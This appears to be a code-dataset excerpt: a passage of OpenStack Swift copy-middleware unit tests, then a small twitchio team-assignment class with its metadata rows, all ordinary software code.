Request.blank('/v1/a/c/o-copy0', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(source_headers.copy(), [], resp_headers) self.app.register('PUT', '/v1/a/c/o-copy1', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers={'Content-Length': 0, 'Destination': 'c/o-copy1', 'Range': 'bytes=1-2'}) status, resp_headers, body = self.call_ssc(req) expected_headers = source_headers.copy() unexpected_headers = ( 'x-object-sysmeta-container-update-override-etag', 'x-object-sysmeta-container-update-override-size', 'x-object-sysmeta-container-update-override-foo') for h in unexpected_headers: expected_headers.pop(h) self.assertEqual('201 Created', status) verify_headers(expected_headers, unexpected_headers, resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy1', path) verify_headers( expected_headers, unexpected_headers, put_headers.items()) self.assertNotIn('etag', put_headers) req = Request.blank('/v1/a/c/o-copy1', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(expected_headers, unexpected_headers, resp_headers) self.app.register('PUT', '/v1/a/c/o-copy2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o-copy2', method='PUT', headers={'Content-Length': 0, 'X-Copy-From': 'c/o'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o-copy2', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') req = Request.blank('/v1/a/c/o-copy2', method='GET') status, resp_headers, body = self.call_ssc(req) self.assertEqual('200 OK', status) verify_headers(source_headers.copy(), [], resp_headers) self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='PUT', headers={'Content-Length': 0, 'X-Copy-From': 'c/o'}) status, resp_headers, body = self.call_ssc(req) self.assertEqual('201 Created', status) verify_headers(source_headers.copy(), [], resp_headers) method, path, put_headers = self.app.calls_with_headers[-1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) verify_headers(source_headers.copy(), [], put_headers.items()) self.assertIn('etag', put_headers) self.assertEqual(put_headers['etag'], 'source etag') def test_COPY_no_destination_header(self): req = Request.blank( '/v1/a/c/o', method='COPY', headers={'Content-Length': 0}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') self.assertEqual(len(self.authorized), 0) def test_basic_COPY_account(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o2', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c1/o2', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('GET', method) self.assertEqual('/v1/a/c/o', path) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o2', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o2', self.authorized[1].path) def test_COPY_across_containers(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c2/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c2/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c2/o', self.authorized[1].path) def test_COPY_source_with_slashes_in_name(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_source_with_slashes_in_name(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_source_with_slashes_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_source_with_slashes_destination_leading_slash(self): self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed') self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o/o2', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertTrue(('X-Copied-From', 'c/o/o2') in headers) self.assertTrue(('X-Copied-From-Account', 'a') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_no_object_in_destination(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c_o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_account_no_object_in_destination(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': 'c_o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_account_bad_destination_account(self): req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'Destination-Account': '/i/am/bad'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '412 Precondition Failed') def test_COPY_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_server_error_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '503 Service Unavailable') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_not_found_reading_source(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '404 Not Found') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_with_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed") self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'X-Object-Meta-Ours': 'okay'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_with_metadata(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed") self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'X-Object-Meta-Ours': 'okay', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a1/c1/o', path) self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay') self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_source_zero_content_length(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) with mock.patch('swift.common.middleware.copy.' 'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_source_zero_content_length(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_account_source_larger_than_max_file_size(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody") req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) with mock.patch('swift.common.middleware.copy.' 'MAX_FILE_SIZE', 1): status, headers, body = self.call_ssc(req) self.assertEqual(status, '413 Request Entity Too Large') self.assertEqual(len(self.authorized), 1) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def test_COPY_newest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'Last-Modified': '123'}, "passed") self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c/o'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a/c/o', self.authorized[1].path) def test_COPY_account_newest(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'Last-Modified': '123'}, "passed") self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'COPY'}, headers={'Destination': '/c1/o', 'Destination-Account': 'a1'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers) self.assertEqual(len(self.authorized), 2) self.assertEqual('GET', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertEqual('PUT', self.authorized[1].method) self.assertEqual('/v1/a1/c1/o', self.authorized[1].path) def test_COPY_in_OPTIONS_response(self): self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk, {'Allow': 'GET, PUT'}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'OPTIONS'}, headers={}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('OPTIONS', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('Allow', 'GET, PUT, COPY') in headers) self.assertEqual(len(self.authorized), 1) self.assertEqual('OPTIONS', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) self.assertNotIn('swift.orig_req_method', req.environ) def test_COPY_in_OPTIONS_response_CORS(self): self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk, {'Allow': 'GET, PUT', 'Access-Control-Allow-Methods': 'GET, PUT'}) req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'OPTIONS'}, headers={}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '200 OK') calls = self.app.calls_with_headers method, path, req_headers = calls[0] self.assertEqual('OPTIONS', method) self.assertEqual('/v1/a/c/o', path) self.assertTrue(('Allow', 'GET, PUT, COPY') in headers) self.assertTrue(('Access-Control-Allow-Methods', 'GET, PUT, COPY') in headers) self.assertEqual(len(self.authorized), 1) self.assertEqual('OPTIONS', self.authorized[0].method) self.assertEqual('/v1/a/c/o', self.authorized[0].path) def _test_COPY_source_headers(self, extra_put_headers): put_headers = {'Destination': '/c1/o', 'X-Object-Meta-Test2': 'added', 'X-Object-Sysmeta-Test2': 'added', 'X-Object-Transient-Sysmeta-Test2': 'added'} put_headers.update(extra_put_headers) get_resp_headers = { 'X-Timestamp': '1234567890.12345', 'X-Backend-Timestamp': '1234567890.12345', 'Content-Type': 'text/original', 'Content-Encoding': 'gzip', 'Content-Disposition': 'attachment; filename=myfile', 'X-Object-Meta-Test': 'original', 'X-Object-Sysmeta-Test': 'original', 'X-Object-Transient-Sysmeta-Test': 'original', 'X-Foo': 'Bar'} self.app.register( 'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers) self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {}) req = Request.blank('/v1/a/c/o', method='COPY', headers=put_headers) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers self.assertEqual(2, len(calls)) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('added', req_headers.get('X-Object-Meta-Test2')) self.assertEqual('added', req_headers.get('X-Object-Sysmeta-Test2')) self.assertEqual('added', req_headers.get('X-Object-Transient-Sysmeta-Test2')) return req_headers def test_COPY_source_headers_no_updates(self): req_headers = self._test_COPY_source_headers({}) self.assertEqual('text/original', req_headers.get('Content-Type')) self.assertEqual('gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=myfile', req_headers.get('Content-Disposition')) self.assertEqual('original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Bar', req_headers.get('X-Foo')) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) def test_COPY_source_headers_with_updates(self): put_headers = { 'Content-Type': 'text/not_original', 'Content-Encoding': 'not_gzip', 'Content-Disposition': 'attachment; filename=notmyfile', 'X-Object-Meta-Test': 'not_original', 'X-Object-Sysmeta-Test': 'not_original', 'X-Object-Transient-Sysmeta-Test': 'not_original', 'X-Foo': 'Not Bar'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('text/not_original', req_headers.get('Content-Type')) self.assertEqual('not_gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=notmyfile', req_headers.get('Content-Disposition')) self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Not Bar', req_headers.get('X-Foo')) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) def test_COPY_x_fresh_metadata_no_updates(self): put_headers = { 'X-Fresh-Metadata': 'true', 'X-Extra': 'Fresh'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('text/original', req_headers.get('Content-Type')) self.assertEqual('Fresh', req_headers.get('X-Extra')) self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test')) self.assertIn('X-Fresh-Metadata', req_headers) self.assertNotIn('X-Object-Meta-Test', req_headers) self.assertNotIn('X-Object-Transient-Sysmeta-Test', req_headers) self.assertNotIn('X-Timestamp', req_headers) self.assertNotIn('X-Backend-Timestamp', req_headers) self.assertNotIn('Content-Encoding', req_headers) self.assertNotIn('Content-Disposition', req_headers) self.assertNotIn('X-Foo', req_headers) def test_COPY_x_fresh_metadata_with_updates(self): put_headers = { 'X-Fresh-Metadata': 'true', 'Content-Type': 'text/not_original', 'Content-Encoding': 'not_gzip', 'Content-Disposition': 'attachment; filename=notmyfile', 'X-Object-Meta-Test': 'not_original', 'X-Object-Sysmeta-Test': 'not_original', 'X-Object-Transient-Sysmeta-Test': 'not_original', 'X-Foo': 'Not Bar', 'X-Extra': 'Fresh'} req_headers = self._test_COPY_source_headers(put_headers) self.assertEqual('Fresh', req_headers.get('X-Extra')) self.assertEqual('text/not_original', req_headers.get('Content-Type')) self.assertEqual('not_gzip', req_headers.get('Content-Encoding')) self.assertEqual('attachment; filename=notmyfile', req_headers.get('Content-Disposition')) self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Sysmeta-Test')) self.assertEqual('not_original', req_headers.get('X-Object-Transient-Sysmeta-Test')) self.assertEqual('Not Bar', req_headers.get('X-Foo')) def test_COPY_with_single_range(self): self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {'etag': 'bogus etag'}, "abcdefghijklmnop") self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {}) req = swob.Request.blank( '/v1/a/c/o', method='COPY', headers={'Destination': 'c1/o', 'Range': 'bytes=5-10'}) status, headers, body = self.call_ssc(req) self.assertEqual(status, '201 Created') calls = self.app.calls_with_headers self.assertEqual(2, len(calls)) method, path, req_headers = calls[1] self.assertEqual('PUT', method) self.assertEqual('/v1/a/c1/o', path) self.assertNotIn('etag', (h.lower() for h in req_headers)) self.assertEqual('6', req_headers['content-length']) req = swob.Request.blank('/v1/a/c1/o', method='GET') status, headers, body = self.call_ssc(req) self.assertEqual('fghijk', body) @patch_policies(with_ec_default=True) class TestServerSideCopyMiddlewareWithEC(unittest.TestCase): container_info = { 'status': 200, 'write_acl': None, 'read_acl': None, 'storage_policy': None, 'sync_key': None, 'versions': None, } def setUp(self): self.logger = debug_logger('proxy-server') self.logger.thread_locals = ('txn1', '127.0.0.2') self.app = PatchedObjControllerApp( None, FakeMemcache(), account_ring=FakeRing(), container_ring=FakeRing(), logger=self.logger) self.ssc = copy.filter_factory({})(self.app) self.ssc.logger = self.app.logger self.policy = POLICIES.default self.app.container_info = dict(self.container_info) def test_COPY_with_single_range(self): req = swob.Request.blank( '/v1/a/c/o', method='COPY', headers={'Destination': 'c1/o', 'Range': 'bytes=5-10'}) segment_size = self.policy.ec_segment_size real_body = ('asdf' * segment_size)[:-10] chunks = [real_body[x:x + segment_size] for x in range(0, len(real_body), segment_size)] fragments = self.policy.pyeclib_driver.encode(chunks[0]) fragment_payloads = [] fragment_payloads.append(fragments) node_fragments = zip(*fragment_payloads) self.assertEqual(len(node_fragments), self.policy.object_ring.replicas) headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body))} responses = [(200, ''.join(node_fragments[i]), headers) for i in range(POLICIES.default.ec_ndata)] responses += [(201, '', {})] * self.policy.object_ring.replicas status_codes, body_iter, headers = zip(*responses) expect_headers = { 'X-Obj-Metadata-Footer': 'yes', 'X-Obj-Multiphase-Commit': 'yes' } put_hdrs = [] def capture_conn(host, port, dev, part, method, path, *args, **kwargs): if method == 'PUT': put_hdrs.append(args[0]) with set_http_connect(*status_codes, body_iter=body_iter, headers=headers, expect_headers=expect_headers, give_connect=capture_conn): resp = req.get_response(self.ssc) self.assertEqual(resp.status_int, 201) expected_puts = POLICIES.default.ec_ndata + POLICIES.default.ec_nparity self.assertEqual(expected_puts, len(put_hdrs)) for hdrs in put_hdrs: self.assertNotIn('etag', (h.lower() for h in hdrs)) def test_COPY_with_invalid_ranges(self): segment_size = self.policy.ec_segment_size real_body = ('a' * segment_size)[:-10] self._test_invalid_ranges('COPY', real_body, segment_size, '%s-' % (segment_size - 10)) self._test_invalid_ranges('COPY', real_body, segment_size, '%s-' % (segment_size + 10)) def _test_invalid_ranges(self, method, real_body, segment_size, req_range): body_etag = md5(real_body).hexdigest() req = swob.Request.blank( '/v1/a/c/o', method=method, headers={'Destination': 'c1/o', 'Range': 'bytes=%s' % (req_range)}) fragments = self.policy.pyeclib_driver.encode(real_body) fragment_payloads = [fragments] node_fragments = zip(*fragment_payloads) self.assertEqual(len(node_fragments), self.policy.object_ring.replicas) headers = {'X-Object-Sysmeta-Ec-Content-Length': str(len(real_body)), 'X-Object-Sysmeta-Ec-Etag': body_etag} start = int(req_range.split('-')[0]) self.assertTrue(start >= 0) title, exp = swob.RESPONSE_REASONS[416] range_not_satisfiable_body = \ '<html><h1>%s</h1><p>%s</p></html>' % (title, exp) if start >= segment_size: responses = [(416, range_not_satisfiable_body, headers) for i in range(POLICIES.default.ec_ndata)] else: responses = [(200, ''.join(node_fragments[i]), headers) for i in range(POLICIES.default.ec_ndata)] status_codes, body_iter, headers = zip(*responses) expect_headers = { 'X-Obj-Metadata-Footer': 'yes', 'X-Obj-Multiphase-Commit': 'yes' } with set_http_connect(*status_codes, body_iter=body_iter, headers=headers, expect_headers=expect_headers): resp = req.get_response(self.ssc) self.assertEqual(resp.status_int, 416) self.assertEqual(resp.content_length, len(range_not_satisfiable_body)) self.assertEqual(resp.body, range_not_satisfiable_body) self.assertEqual(resp.etag, body_etag) self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
true
true
f705def54e26d0238b7f51ef53f14a89af887b66
1,087
py
Python
src/bot/TeamData.py
malmgrens4/TwIOTch
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
[ "MIT" ]
null
null
null
src/bot/TeamData.py
malmgrens4/TwIOTch
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
[ "MIT" ]
null
null
null
src/bot/TeamData.py
malmgrens4/TwIOTch
a3e05f5fcb5bcd75aba3cf9533ca7c5308e4a2de
[ "MIT" ]
null
null
null
from typing import Dict from twitchio.dataclasses import Message class TeamData: def __init__(self, num_teams: int = 2): self.num_teams = num_teams self.teams: Dict[int, int] = {} async def handle_join(self, msg: Message) -> None: if msg.author.id in self.teams: # User already on a team return all_teams = self.teams.values() if len(all_teams) < self.num_teams: self.teams[msg.author.id] = len(all_teams) return team_counts: Dict[int, int] = {} for team_id in all_teams: team_counts[team_id] = team_counts.setdefault(team_id, 0) + 1 min_member_team_id = min(team_counts, key=team_counts.get) self.teams[msg.author.id] = min_member_team_id def get_team_member_map(self): reverse_dict = {} for k, v in self.teams.items(): reverse_dict.setdefault(v, []).append(k) return reverse_dict def reset(self, num_teams: int = 2): self.num_teams = num_teams self.teams: Dict[int, int] = {}
29.378378
73
0.609016
from typing import Dict from twitchio.dataclasses import Message class TeamData: def __init__(self, num_teams: int = 2): self.num_teams = num_teams self.teams: Dict[int, int] = {} async def handle_join(self, msg: Message) -> None: if msg.author.id in self.teams: return all_teams = self.teams.values() if len(all_teams) < self.num_teams: self.teams[msg.author.id] = len(all_teams) return team_counts: Dict[int, int] = {} for team_id in all_teams: team_counts[team_id] = team_counts.setdefault(team_id, 0) + 1 min_member_team_id = min(team_counts, key=team_counts.get) self.teams[msg.author.id] = min_member_team_id def get_team_member_map(self): reverse_dict = {} for k, v in self.teams.items(): reverse_dict.setdefault(v, []).append(k) return reverse_dict def reset(self, num_teams: int = 2): self.num_teams = num_teams self.teams: Dict[int, int] = {}
true
true
f705df36178023a0b1008fe69f304ba47ddbd2e2
7,661
py
Python
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
EnricoMagnago/F3
c863215c318d7d5f258eb9be38c6962cf6863b52
[ "MIT" ]
3
2021-04-23T23:29:26.000Z
2022-03-23T10:00:30.000Z
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
EnricoMagnago/F3
c863215c318d7d5f258eb9be38c6962cf6863b52
[ "MIT" ]
null
null
null
benchmarks/f3_wrong_hints/scaling_nonlinear_software/8-19_33.py
EnricoMagnago/F3
c863215c318d7d5f258eb9be38c6962cf6863b52
[ "MIT" ]
1
2021-11-17T22:02:56.000Z
2021-11-17T22:02:56.000Z
